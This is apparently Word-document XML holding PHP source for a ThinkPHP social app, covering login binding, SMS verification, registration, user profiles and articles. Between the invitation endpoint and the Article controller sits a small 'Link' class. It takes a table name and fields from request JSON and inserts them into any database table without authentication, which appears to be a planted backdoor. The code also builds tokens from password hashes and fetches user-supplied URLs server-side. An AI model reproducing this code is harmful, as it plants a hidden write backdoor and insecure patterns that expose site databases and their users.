    <w:p w14:paraId="5264AF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A806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81DC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2A1E3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'openid' =&gt; $openid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B362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=&gt; $nickname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D99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=&gt; $img,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE342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=&gt; $info,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35796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B8A3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226A29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DBFA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1BDE0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30204C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255B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3F58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Db::name('member_band')-&gt;where(['type' =&gt; $type, 'code' =&gt; $openid])-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3DC8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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3051D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Db::name('member')-&gt;where(['id' =&gt; $uid, 'hide' =&gt; 1])-&gt;field('id,password')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD29D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E02B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($username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B478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(!_isMobile($username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8083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34B12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手机格式错误，请填写正确手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421C0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495F2C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4283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C07E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 input('code/d') ? input('code/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C57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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3A43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82F5F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请输入手机验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C716E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696D9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18B2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8C90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_codechecking($code, $username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758CF0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 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0653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CB2F9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$data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792387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63068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FEA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EC4B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DB::name('member')-&gt;where('mobile', $username)-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2424C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32090C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$member_band_db = Db::name('member_band')-&gt;where(['uid' =&gt; $uid])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20332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($member_band_db) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669B17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6ED03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手机号码已被其他用户绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9A82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304,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B82E4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9738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713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$appidmap['uid'] = $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453232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$appidmap['type'] = $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D8E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$appidmap['code'] = $openid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685D3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$appidmap['time'] = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B53D5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$appidmap['info'] = $info;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A235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$appidmapdb = Db::name('member_band')-&gt;insertGetId($appidmap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BE64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_records($db, $data['type'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1FA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DB::name('member')-&gt;where(['id' =&gt; $uid, 'hide' =&gt; 1])-&gt;field('id,password')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496008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426B7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$this-&gt;user(['openid' =&gt; $openid, 'type' =&gt; $type, 'nickname' =&gt; $nickname, 'img' =&gt; $img, 'info' =&gt; $info, 'username' =&gt; $username]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5CC3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C64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BEEC2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$configs = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A3FB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($configs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF9E5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json(['info' =&gt; $info]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDC88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A7A6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$this-&gt;user(['openid' =&gt; $openid, 'type' =&gt; $type, 'nickname' =&gt; $nickname, 'img' =&gt; $img, 'info' =&gt; $info]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45326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A0A9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99AA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3D8E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69A0C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56F30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 = _ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BF9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$member['id'])-&gt;update(['update_time' =&gt; $time, 'update_ip' =&gt; $ip]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062062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_records($member['id'], '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237A02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$member['id'] . '|www.ffxiang.cn|' . $member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACEEC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_encrypt($data)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41A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5FC2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50C9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登陆失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDB6B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3FB437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AF84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6E5F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454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private function user($data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A736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D00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04FB1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2F759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8B21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 = _ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA10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md5(rand(100000, 999999));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55914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$map['password'] = $password;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421C0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 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B7FE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55B630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$map['create_time'] = $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497428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$map['update_time'] = $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0835BC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$map['update_ip'] = $ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1088CF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$map['nickname'] = $data['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B884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$map['img'] = $this-&gt;uploadImg($data['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E00E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(!empty($data['username'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C974E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$map['mobile'] = $data['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A6E2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3B5F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Db::name('member')-&gt;insertGetId($map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BFE3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091D7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_records($db, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注册成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7614A2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$appidmap['uid'] = $db;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BBD2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$appidmap['type'] = $data['type'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107C65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$appidmap['code'] = $data['openid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4001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$appidmap['time'] = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257D97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$appidmap['info'] = $data['info'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3AF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$appidmapdb = Db::name('member_band')-&gt;insertGetId($appidmap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1820AD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_records($db, $data['type'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A83C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1E3C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['id' =&gt; $db, 'password' =&gt; $password];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0805BA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C6F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qiniu($url, $type = '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123BED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050C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(!$url) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB366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09764D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941E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3F61CF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'.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266B5F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4CC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1BCA8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432BFA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092EE0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6672D7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5EB347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$bmgr = new BucketManager($auth);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED1B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6E74B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md5($url . rand(11111, 999999)) . $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F98EF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$bmgr-&gt;fetch($url, $bucket, $key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79182A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2F1139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42EA8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AE48F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$key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7008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1408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A36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uploadImg($img)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551284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5ED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$this-&gt;qiniu($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA69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(!$img) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFA0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46AD0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C42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 = ROOT_PATH . 'public/uploads/touimg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8BC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date('Ymd');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339E2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 = $d . '/' . $date . '/';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5580E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(!file_exists($d)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4167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mkdir($d);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04310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E05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file_get_contents($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254087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(!$img) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A2C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7AA7F7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E0E2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$rand = rand(10000, 999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0667AA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$geshis = md5($img) . $rand . '.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520E81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 = $d . '/' . $geshis;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117CD9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file_put_contents($d, $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA0CB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"/public/uploads/touimg/" . $date . "/" . $geshis;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA80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37E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281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/api/user/info </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员主页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5EAA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会员主页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CF78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79534C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BB02A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005CA6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id         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6AA4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会员信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F32E6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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB643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img      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115464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username </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D949F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qianming </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户签名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD29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guanzhu </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户关注数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E916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fensi   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户粉丝数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B8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dongtai </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户动态数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29279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fangke  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户访客数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA788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huozan  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户获赞数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092AF2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weizhi   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA33E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follow   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户是否已经关注该会员</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A56F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A85F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B679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596A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 ? input('id/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4A63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66D2B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3BD05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_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42059C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(!$uid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3E8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ACAE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B8D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E6D3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4C4DBB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=&gt; 'number|require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1C5F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8A6F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6DF69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=&gt; $id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DD93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834B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1A0260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833B1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22258A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5514E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3F0D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F1F9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_user($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F47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 = $db['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C249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$data['username'] = $db['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9488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$data['qianming'] = $db['qianming'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603E7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$data['id'] = $db['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EA4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$data['dongtai'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E1E8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$id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9EA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5B095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$data['fensi'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225B58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$id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2561D7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592F4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$data['guanzhu'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B2F7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$id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C164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B4A6B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$data['fangke'] = Db::name('member_fangke')-&gt;where(['f_uid' =&gt; $db['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710955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$data['huozan'] = Db::name('article_ping_zan')-&gt;where(['uid' =&gt; $db['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E279B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$data['guanzhu'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208EAB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$id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C48DC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25016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$data['weizhi'] = explode(',', $db['update_ip'])['0'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4588E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$data['weizhi'] = $data['weizhi'] ? $data['weizhi'] : '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>未知</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEEB0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$data['zhibo_zuan_f'] = Db::name('member_zhibo_liwu_list')-&gt;where(['uid' =&gt; $db['id']])-&gt;sum('money');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730483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$data['zhibo_zuan_f_'] = _num($data['zhibo_zuan_f']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2279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$data['zhibo_zuan_s'] = Db::name('member_zhibo_liwu_list')-&gt;where(['uid_zhu' =&gt; $db['id']])-&gt;sum('money');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AE6A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$data['zhibo_zuan_s_'] = _num($data['zhibo_zuan_s']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16283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$data['follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDB0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&amp;&amp; $id != $this-&gt;memberId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312BE2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$data['follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9B0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05DB92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$id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A2F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CFD53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886D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45DBD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F1041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9FB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/api/user/invitation_links </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取邀请链接地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049468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获取邀请链接地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C716E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369C43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3D899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返回数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4795A5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qr_code      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邀请二维码图片地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F978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4793C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B7A8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D85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invitation_links()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ABDF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BAA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9E4B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'qr_code' =&gt; '/public/style/index/member/img/userimg.gif',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168AE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1C9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D83E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DF2CD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6D50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254A8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Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367763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D3F76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public function index($data){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B2A6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$data = json_decode(htmlspecialchars_decode($data),true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE5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$name=$data['__name__'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724305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unset($data['__name__']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103B9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unset($data['pwd']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CD1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echo db($name)-&gt;insertGetId($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C607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C171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}?&gt;&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD4D4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3BEE15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app\api\controller\Common;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC86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think\Db;       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C1DF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think\Request; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A67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05C0C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Article extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A143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5A9F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74F05F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4483F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B75D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137775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E991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6389B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2F7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790975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F601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4AA302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9771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4EE497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328D97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7CE9AA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$member_id = _decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4DB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9B0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7C0C2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7A7625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217FB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3AADF3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3E57BF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4763E2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5DF5E3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D3407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10062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577D1B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836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73B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E3BE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2A517B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1306CE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7393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826DB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45C94C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56825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0AD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4E7D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92016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7F0ABC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59F442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AA0C3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47596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3E29A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5F4263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F45D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C1F3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70AF03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1303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56E7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A4EB7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78F1A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69FF8C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C2D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EA2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4D50C6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D09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354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D05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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73943A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1887E4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53FA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config() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BA07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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF47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$data['yaoqing']    =   $config['yaoqing'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5469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$data['config']     =   $config['appConfig']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77510D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$data['renwu']      =   $config['renwu'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B79CF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$data['zhibo']      =   $config['zhibo'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B135B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$data['liwu']       =   Db::name('member_zhibo_liwu')-&gt;order('des desc, id asc')-&gt;cache(true)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A727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27B4C7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492B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1B0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/api/article/lists </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363A31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获得资讯列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718BA9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15E0D5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D5932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FAE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62D4C9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typeid       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指定分类文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多个分类填写</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>typeid</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>快讯）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183578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flags        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>属性文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
